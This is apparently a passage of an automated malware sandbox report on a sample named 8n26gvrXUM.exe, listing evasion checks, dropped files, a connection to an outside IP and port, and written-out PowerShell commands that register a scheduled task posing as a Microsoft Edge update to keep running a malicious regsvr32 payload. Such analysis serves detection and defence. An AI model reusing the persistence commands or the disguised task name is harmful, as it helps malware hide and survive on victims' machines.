      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
      Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
      Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
      Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
      Source: regsvr32.exe, 00000009.00000002.1165478568.00000000004CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDAG.EXE
      Source: regsvr32.exe, 00000009.00000002.1165478568.00000000004CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDAQ.EXE
      Source: C:\Windows\System32\regsvr32.exeMemory allocated: 2F50000 memory reserve | memory write watch
      Source: C:\Windows\System32\regsvr32.exeMemory allocated: 1B3B0000 memory reserve | memory write watch
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD348EB900 CreateToolhelp32Snapshot,memset,Process32FirstW,memcpy,memcpy,CloseHandle,GetCurrentProcessId,DebugActiveProcess,GetCurrentProcess,TerminateProcess,CloseHandle,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,DebugActiveProcess,GetCurrentProcess,TerminateProcess,9_2_00007FFD348EB900
      Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9914Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9843Jump to behavior
      Source: C:\Windows\System32\regsvr32.exeWindow / User API: threadDelayed 9864
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9907
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_setup64.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_isdecmp.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_shfoldr.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\is-JVPOA.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\netapi32_1.drv (copy)Jump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-M0V11.tmp\_isetup\_isdecmp.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-J08NI.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-M0V11.tmp\_isetup\_setup64.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)Jump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-M0V11.tmp\_isetup\_shfoldr.dllJump to dropped file
      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.9 %
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7408Thread sleep count: 9914 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096Thread sleep count: 9843 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096Thread sleep count: 79 > 30Jump to behavior
      Source: C:\Windows\System32\regsvr32.exe TID: 7184Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\regsvr32.exe TID: 6092Thread sleep time: -2767011611056431s >= -30000s
      Source: C:\Windows\System32\regsvr32.exe TID: 3308Thread sleep count: 9864 > 30
      Source: C:\Windows\System32\regsvr32.exe TID: 3308Thread sleep count: 90 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9052Thread sleep count: 9907 > 30
      Source: C:\Windows\System32\svchost.exe TID: 1816Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070409Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04090409Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08090809Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070409Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04090409Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08090809Jump to behavior
      Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477
      Source: powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 0000000F.00000002.1110863403.0000020890077000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
      Source: powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: regsvr32.exe, 0000000E.00000002.2141520016.000000001BB1E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1337298910.000000001C0F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2142655028.000000001C0EC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2136362974.000001C711C2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139259075.000001C71388E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD348EB900 CreateToolhelp32Snapshot,memset,Process32FirstW,memcpy,memcpy,CloseHandle,GetCurrentProcessId,DebugActiveProcess,GetCurrentProcess,TerminateProcess,CloseHandle,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,DebugActiveProcess,GetCurrentProcess,TerminateProcess,9_2_00007FFD348EB900
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD348E7F00 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateEventW,WaitForSingleObject,9_2_00007FFD348E7F00
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD34947EC0 GetProcessHeap,9_2_00007FFD34947EC0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\regsvr32.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\regsvr32.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 144.202.34.112 56001
      Source: C:\Windows\System32\regsvr32.exeThread register set: 8808 5
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 3Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\8n26gvrXUM.exe "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXESJump to behavior
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"Jump to behavior
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AA590E8-E6D2-49AB-E5B8-6BCEE32CF7C9}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"Jump to behavior
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:sync c:\users\user\appdata\roaming\netapi32_1.drv\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{5aa590e8-e6d2-49ab-e5b8-6bcee32cf7c9}' -description 'microsoftedgeupdatetaskmachineua' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries -executiontimelimit 0) -runlevel highest"
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:sync c:\users\user\appdata\roaming\netapi32_1.drv\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{5aa590e8-e6d2-49ab-e5b8-6bcee32cf7c9}' -description 'microsoftedgeupdatetaskmachineua' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries -executiontimelimit 0) -runlevel highest"Jump to behavior
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2137187188.0000000003970000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2137187188.000000000391E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2137187188.0000000003970000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2137187188.0000000003685000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager*
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2137187188.0000000003970000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
